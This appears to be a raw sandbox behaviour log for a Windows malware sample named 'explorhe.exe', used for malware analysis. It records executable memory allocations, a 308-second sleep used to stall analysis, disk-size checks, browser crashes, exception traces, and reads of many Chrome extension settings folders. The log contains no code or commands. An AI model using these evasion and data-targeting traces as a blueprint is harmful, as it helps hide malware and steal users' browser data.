protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 147456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 81920
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 475136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 81920
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 114688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72a22000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aa0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3012
region_size: 8261632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02f60000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3012
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03740000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758af000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758af000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758af000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758af000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7587c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7589c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7587c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7589c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ce3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72d87000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757c9000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75522000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75862000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758af000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758af000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758af000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3012
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03530000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72a22000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72181000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 604
region_size: 11341824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x030e0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 604
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03bb0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758af000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758af000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758af000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758af000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7587c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7589c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7587c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7589c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ce3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 604
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72d87000
process_handle: 0xffffffff
1 0 0
description explorhe.exe tried to sleep 308 seconds, actually delayed analysis time by 308 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 10124828672
free_bytes_available: 10124828672
root_path: C:
total_number_of_bytes: 34252779520
1 1 0
Application Crash Process iexplore.exe with pid 3012 crashed
Application Crash Process chrome.exe with pid 2856 crashed
Application Crash Process chrome.exe with pid 1308 crashed
Application Crash Process chrome.exe with pid 1156 crashed
Application Crash Process firefox.exe with pid 2980 crashed
Application Crash Process firefox.exe with pid 2580 crashed
Application Crash Process firefox.exe with pid 2964 crashed
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74724387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x75c4ef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x75c46b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x75c65c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x75ce06b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x747fd7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x747fd876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x747fddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74718a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74718938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7471950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x747fdccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x747fdb41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x747fe1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74719367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74719326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7585788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x746da48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x746d853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x746da4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x746ecd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x746ed87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 113308432
registers.edi: 95063068
registers.eax: 113308432
registers.ebp: 113308512
registers.edx: 31
registers.ebx: 113308796
registers.esi: 2147746133
registers.ecx: 95342760
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x747ff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x75c6414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x746cfe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x747fa338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x761ae99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x761872ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x7617ab0d
GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x7617ea98
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x761787f7
CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x7617ba32
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4
DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x75857bca
CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x761a516f
CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x761a50ce
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x7617a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76179b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76179aa8
CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x761a530c
URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x761a57a0
DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x7167540c
DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x716752ca
CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x71750ea3
RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x76f77e96
TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x76f554f4
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 77583968
registers.edi: 1953561104
registers.eax: 77583968
registers.ebp: 77584048
registers.edx: 1
registers.ebx: 7160388
registers.esi: 2147746133
registers.ecx: 1610980466
1 0 0

__exception__

stacktrace:

exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 185461136
registers.r15: 185461576
registers.rcx: 1296
registers.rsi: 17302540
registers.r10: 0
registers.rbx: 108022336
registers.rsp: 185460296
registers.r11: 185464832
registers.r8: 1994752396
registers.r9: 0
registers.rdx: 1444
registers.r12: 6927568
registers.rbp: 185460448
registers.rdi: 6927312
registers.rax: 5975552
registers.r13: 185461008
1 0 0

__exception__

stacktrace:
0x3b2e04
0x30

exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 c1 76
exception.instruction: call qword ptr [rip + 0x91f16]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x3b2e04
registers.r14: 185003552
registers.r15: 185003992
registers.rcx: 1476
registers.rsi: 17302540
registers.r10: 0
registers.rbx: 107495136
registers.rsp: 185002728
registers.r11: 185007248
registers.r8: 1994752396
registers.r9: 0
registers.rdx: 1496
registers.r12: 33535264
registers.rbp: 185002864
registers.rdi: 33272512
registers.rax: 3878400
registers.r13: 185003424
1 0 0

__exception__

stacktrace:
0x5b2e04
0x30

exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 c1 76
exception.instruction: call qword ptr [rip + 0x91f16]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5b2e04
registers.r14: 181596304
registers.r15: 181596744
registers.rcx: 1312
registers.rsi: 17302540
registers.r10: 0
registers.rbx: 108175920
registers.rsp: 181595480
registers.r11: 181600000
registers.r8: 1994752396
registers.r9: 0
registers.rdx: 1412
registers.r12: 32552208
registers.rbp: 181595616
registers.rdi: 32289456
registers.rax: 5975552
registers.r13: 181596176
1 0 0

__exception__

stacktrace:
0xcd1f04
0x30

exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07
exception.instruction: cmp dword ptr [rip + 0x2d18d], 0
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xcd1f04
registers.r14: 8910816
registers.r15: 8910320
registers.rcx: 48
registers.rsi: 14752640
registers.r10: 0
registers.rbx: 0
registers.rsp: 8909368
registers.r11: 8911568
registers.r8: 1994752396
registers.r9: 0
registers.rdx: 8796092887632
registers.r12: 8910151
registers.rbp: 8909488
registers.rdi: 100
registers.rax: 13442816
registers.r13: 2
1 0 0

__exception__

stacktrace:
0xcd1f04
0x30

exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07
exception.instruction: cmp dword ptr [rip + 0x2d18d], 0
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xcd1f04
registers.r14: 10222480
registers.r15: 10221984
registers.rcx: 48
registers.rsi: 14704704
registers.r10: 0
registers.rbx: 0
registers.rsp: 10221032
registers.r11: 10223232
registers.r8: 1994752396
registers.r9: 0
registers.rdx: 8796092887632
registers.r12: 10221815
registers.rbp: 10221152
registers.rdi: 100
registers.rax: 13442816
registers.r13: 2
1 0 0

__exception__

stacktrace:
0xbc1f04
0x7fe00000030

exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07
exception.instruction: cmp dword ptr [rip + 0x2d18d], 0
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xbc1f04
registers.r14: 9826824
registers.r15: 8791498856048
registers.rcx: 48
registers.rsi: 8791498787712
registers.r10: 0
registers.rbx: 0
registers.rsp: 9826456
registers.r11: 9829840
registers.r8: 1994752396
registers.r9: 0
registers.rdx: 8796092887632
registers.r12: 15964672
registers.rbp: 9826576
registers.rdi: 66166816
registers.rax: 12328704
registers.r13: 9827416
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Sync Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
